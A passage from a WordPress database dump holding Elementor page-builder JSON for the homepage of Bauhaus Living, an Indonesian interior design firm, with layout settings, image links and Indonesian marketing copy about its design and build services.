/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4194,4916,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4195,4916,'_elementor_pro_version','3.8.1'),(4196,4917,'_wp_page_template','elementor_header_footer'),(4197,4917,'_elementor_edit_mode','builder'),(4198,4917,'_elementor_template_type','wp-page'),(4199,4917,'_elementor_version','3.8.1'),(4200,4917,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 